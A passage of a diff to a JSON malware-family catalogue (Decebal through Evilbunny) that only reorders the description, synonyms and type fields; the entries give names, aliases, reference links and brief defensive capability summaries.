"https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", - "value": "Decebal", - "description": "" + "value": "Decebal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", - "value": "Delta(Alfa,Bravo, ...)", - "description": "" + "value": "Delta(Alfa,Bravo, ...)" }, { + "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", - "value": "Dented", - "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." + "value": "Dented" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", - "value": "DeputyDog", - "description": "" + "value": "DeputyDog" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", "https://twitter.com/struppigel/status/812601286088597505" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", - "value": "DeriaLock", - "description": "" + "value": "DeriaLock" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", - "value": "Derusbi", - "description": "" + "value": "Derusbi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", - "value": "Devil's Rat", - "description": "" + "value": "Devil's Rat" }, { + "description": "", "meta": { - "synonyms": [ - "LusyPOS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", @@ -5571,51 +5571,49 @@ "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" - ] + ], + "synonyms": [ + "LusyPOS" + ], + "type": [] }, "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", - "value": "Dexter", - "description": "" + "value": "Dexter" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", - "value": "DE Loader", - "description": "" + "value": "DE Loader" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + ], "synonyms": [ "Crysis", "Arena" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", - "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" - ] + "type": [] }, "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", - "value": "Dharma", - "description": "" + "value": "Dharma" }, { + "description": "", "meta": { - "synonyms": [ - "Crystal", - "Gorynych", - "Gorynch" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://www.scmagazine.com/inside-diamondfox/article/578478/", @@ -5623,43 +5621,47 @@ "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://blog.cylance.com/a-study-in-bots-diamondfox" - ] + ], + "synonyms": [ + "Crystal", + "Gorynych", + "Gorynch" + ], + "type": [] }, "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", - "value": "DiamondFox", - "description": "" + "value": "DiamondFox" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", - "value": "Dimnie", - "description": "" + "value": "Dimnie" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", - "value": "DirCrypt", - "description": "" + "value": "DirCrypt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", @@ -5668,173 +5670,173 @@ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", - "value": "DistTrack", - "description": "" + "value": "DistTrack" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", - "value": "DMA Locker", - "description": "" + "value": "DMA Locker" }, { + "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", - "value": "DNSMessenger", - "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." + "value": "DNSMessenger" }, { + "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", "meta": { - "synonyms": [ - "Shelma" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" - ] + ], + "synonyms": [ + "Shelma" + ], + "type": [] }, "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", - "value": "DogHousePower", - "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." + "value": "DogHousePower" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", "https://research.checkpoint.com/dorkbot-an-investigation/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", - "value": "NgrBot", - "description": "" + "value": "NgrBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", - "value": "Dorshel", - "description": "" + "value": "Dorshel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", - "value": "DoublePulsar", - "description": "" + "value": "DoublePulsar" }, { + "description": "", "meta": { - "synonyms": [ - "DELPHACY" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" - ] + ], + "synonyms": [ + "DELPHACY" + ], + "type": [] }, "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", - "value": "Downdelph", - "description": "" + "value": "Downdelph" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", - "value": "Downeks", - "description": "" + "value": "Downeks" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", "http://www.clearskysec.com/charmingkitten/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", - "value": "DownPaper", - "description": "" + "value": "DownPaper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", - "value": "DramNudge", - "description": "" + "value": "DramNudge" }, { + "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", "https://lokalhost.pl/gozi_tree.txt", "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", - "value": "DreamBot", - "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." + "value": "DreamBot" }, { + "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", @@ -5846,257 +5848,257 @@ "https://viql.github.io/dridex/", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", - "value": "Dridex", - "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" + "value": "Dridex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", - "value": "DROPSHOT", - "description": "" + "value": "DROPSHOT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor", - "description": "" + "value": "DtBackdoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" + "value": "DualToy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", - "value": "DarkHotel", - "description": "" + "value": "DarkHotel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", "https://github.com/ch0sys/DUBrute" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", - "value": "DUBrute", - "description": "" + "value": "DUBrute" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", - "value": "Dumador", - "description": "" + "value": "Dumador" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", - "value": "DuQu", - "description": "" + "value": "DuQu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", - "value": "Duuzer", - "description": "" + "value": "Duuzer" }, { + "description": "", "meta": { - "synonyms": [ - "Dyreza" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" - ] + ], + "synonyms": [ + "Dyreza" + ], + "type": [] }, "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", - "value": "Dyre", - "description": "" + "value": "Dyre" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", "https://twitter.com/JaromirHorejsi/status/815861135882780673" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", - "value": "EDA2", - "description": "" + "value": "EDA2" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", - "value": "EHDevel", - "description": "" + "value": "EHDevel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", - "value": "Elirks", - "description": "" + "value": "Elirks" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://www.joesecurity.org/blog/8409877569366580427" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", - "value": "Elise", - "description": "" + "value": "Elise" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", - "value": "Emdivi", - "description": "" + "value": "Emdivi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", "https://twitter.com/thor_scanner/status/992036762515050496" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", - "value": "Empire Downloader", - "description": "" + "value": "Empire Downloader" }, { + "description": "", "meta": { - "synonyms": [ - "Lurid" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" - ] + ], + "synonyms": [ + "Lurid" + ], + "type": [] }, "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", - "value": "Enfal", - "description": "" + "value": "Enfal" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c4490972-3403-4043-9d61-899c0a440940", - "value": "EquationDrug", - "description": "" + "value": "EquationDrug" }, { + "description": "Rough collection EQGRP samples, to be sorted", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", @@ -6108,52 +6110,42 @@ "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/08/28/feintcloud.html", "https://laanwj.github.io/2016/08/22/blatsting.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", - "value": "Equationgroup (Sorting)", - "description": "Rough collection EQGRP samples, to be sorted" + "value": "Equationgroup (Sorting)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" + "value": "Erebus" }, { + "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", - "value": "Eredel", - "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" + "value": "Eredel" }, { + "description": "", "meta": { - "synonyms": [ - "ExPetr", - "Pnyetya", - "Petna", - "NotPetya", - "Nyetya", - "NonPetya", - "nPetya", - "Diskcoder.C", - "BadRabbit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", "https://securelist.com/schroedingers-petya/78870/", @@ -6190,333 +6182,341 @@ "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" - ] + ], + "synonyms": [ + "ExPetr", + "Pnyetya", + "Petna", + "NotPetya", + "Nyetya", + "NonPetya", + "nPetya", + "Diskcoder.C", + "BadRabbit" + ], + "type": [] }, "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", - "value": "EternalPetya", - "description": "" + "value": "EternalPetya" }, { + "description": "", "meta": { - "synonyms": [ - "HighTide" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] + ], + "synonyms": [ + "HighTide" + ], + "type": [] }, "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", - "value": "EtumBot", - "description": "" + "value": "EtumBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", - "value": "Evilbunny", - "description": "" + "value": "Evilbunny" }, { + "description": "", "meta": { - "synonyms": [ - "Vidgrab" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" - ] + ], + "synonyms": [ + "Vidgrab" + ], + "type": [] }, "uuid": 